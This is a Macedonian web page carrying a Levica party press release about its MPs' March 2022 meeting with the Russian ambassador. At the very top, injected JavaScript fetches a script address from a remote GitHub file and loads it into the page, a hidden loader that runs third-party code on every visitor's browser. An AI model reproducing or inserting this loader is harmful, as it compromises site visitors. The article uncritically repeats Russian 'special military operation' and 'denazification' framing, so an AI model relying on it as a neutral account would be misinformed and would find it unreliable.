;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Пратениците на Левица остварија средба со рускиот амбасадор Бездникин во Собранието на Република Македонија - Антропол
АктуелноИнтернационално

Пратениците на Левица остварија средба со рускиот амбасадор Бездникин во Собранието на Република Македонија

  • Соопштение на Политичката партија Левица.

Денес, 16 март 2022 година (среда), со почеток во 13:00 часот, во репрезентативната „Струшка сала“ на Собранието на РМ – пратениците на Левица проф. д-р Димитар Апасиев и Борислав Крмов остварија деведесетминутна работна средба со рускиот амбасадор во Република Македонија – Н.Е. Сергеј Баздникин.

На оваа втора официјална средба беше разговарано за актуелните домашни и меѓународни теми, со посебен осврт на специјалната воена операција во Украина и последиците од истата по меѓународниот поредок. Акцент се стави на процесот на денацификација и елиминирање на заканите од екстремно-десничарските и радикалните неонацистички политички движења, кои се опасност за секоја современа демократија.

Отворени беа и прашања од важност за Западен Балкан, како и за непромислените русофобски изјави на шефот на дипломатијата – г. Бујар Османи, кои беа оценети како провокаторски и непријателски, и кои воопшто не придонесуваат кон развојот на традиционално добрите односи меѓу македонскиот и рускиот народ.

Пратеникот Апасиев се огради од последните контроверзни дејствија на македонската дипломатија и потсети дека овие нецивилизирани антируски чекори воопшто не ја изразуваат волјата на мнозинството македонски граѓани.

Осудени беа и непотребните санкции кои Република Македонија, под притисок на ЕУ и НАТО, ги воведе спрема Руската Федерација – од кои најголеми губитници ќе бидат токму македонските земјоделци, а потенцирана беше и заканата од загрозување на досегашниот постоечки безвизен режим меѓу Москва и Скопје, што ќе го отежне патувањето и транспортот меѓу државите.

Отворени беа и други важни прашања за културната и образовната размена помеѓу двете земји, а беа опфатени и теми од современата геополитика.

Средбата помина во срдечна и пријателска атмосфера, со надеж за продлабочена идна соработка меѓу двата народа, а на крајот од истата на амабасадорот му беше врачена и свечена монета со ликот на Гоце Делчев, која Левичарскиот институт „Рацин“ ја изработи по повод 150 годишнината од раѓањето на овој македонски великан.